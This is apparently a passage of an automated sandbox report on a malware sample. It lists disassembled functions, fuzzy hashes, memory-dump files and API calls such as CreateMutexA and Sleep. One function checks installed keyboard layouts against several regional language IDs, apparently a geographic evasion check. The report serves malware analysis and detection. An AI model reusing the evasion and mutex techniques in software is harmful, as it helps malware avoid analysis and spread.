Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID:
API String ID: 1192502693-0
Opcode ID: bcdaf90b6742529ebd6fc755fd85b15ed27ab978f9cdf92c98188cc5e35a6589
Instruction ID: 5e8670bf784e3dcbdc41c8904486150a344efd450d52e3a91ecc01a453828238
Opcode Fuzzy Hash: bcdaf90b6742529ebd6fc755fd85b15ed27ab978f9cdf92c98188cc5e35a6589
Instruction Fuzzy Hash: CE729C71A042489BEB08DF28DD86B9DBBB6EF45314F10825DF854B73C1EB359A81C791

Function 00F0652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00F0652A,?,?,?,?,?,00F07661), ref: 00F06567

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4fd670a671908e91c2fe0222e098eb2da0eb4303742116f8484665100cf9e2cd
Instruction ID: 0c12637cc427c6d40a3f6b703b3296879d5c70c5674028a010ab9fb44d030c2c
Opcode Fuzzy Hash: 4fd670a671908e91c2fe0222e098eb2da0eb4303742116f8484665100cf9e2cd
Instruction Fuzzy Hash: 87E0CD30040108BFCF357B18CC5DD593B6AEF51755F040804F81886163CB39ED61F580

Function 04CE027F Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747729445.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7ef3ddabbb1b78b5feb376f6276009ac2c139ea0d64b6e08ca096521a23e39
Instruction ID: b943462a59a661b83b7180fba7e75c4001a01e3b99cdc9d5ebf98be67ec4a000
Opcode Fuzzy Hash: bf7ef3ddabbb1b78b5feb376f6276009ac2c139ea0d64b6e08ca096521a23e39
Instruction Fuzzy Hash: A441D0EB24C170AEA14245936B14AF66BAFE5D3330334846BF842C5543F3D56A4A61F2

Function 00ED5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Keyboard Layout\Preload, xrefs: 00ED6054
00000423, xrefs: 00ED60FA
00000419, xrefs: 00ED6098
00000422, xrefs: 00ED60C9
0000043f, xrefs: 00ED612B

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: a3867d84dfd9e118b6e11b85cd1a64ad07b5c61f8afd8ccd815c27d0b81d0814
Instruction ID: a5c5a1164b32f97f28bcbfe6b5fd669859849a36d5395b824035e800bcb793a3
Opcode Fuzzy Hash: a3867d84dfd9e118b6e11b85cd1a64ad07b5c61f8afd8ccd815c27d0b81d0814
Instruction Fuzzy Hash: 34F1F27190025C9BEB24DF14CC84BEEBBBAEB44304F5046A9F518A73C1DB74AA85CF95

Function 00ED9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EDA963
CreateMutexA.KERNEL32(00000000,00000000,00F33254), ref: 00EDA981

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dd46d4c27f79df6e3cc26ae933309acc1450977c9dbddfa15cb626cd05759891
Instruction ID: d82964a6412e7735250ed5b5d28b582ccfde8227c0b9c3f2872bd4447b30d88f
Opcode Fuzzy Hash: dd46d4c27f79df6e3cc26ae933309acc1450977c9dbddfa15cb626cd05759891
Instruction Fuzzy Hash: F83148717042488BEB08DB78ECC976DF7A6EBC1318F24921AE014F73D6C7769A829751

Function 00ED9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EDA963
CreateMutexA.KERNEL32(00000000,00000000,00F33254), ref: 00EDA981

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d6cdb21722d35bf346614cad7999683f55ee9826a96be1cd7f6b2c9f89ca4b2b
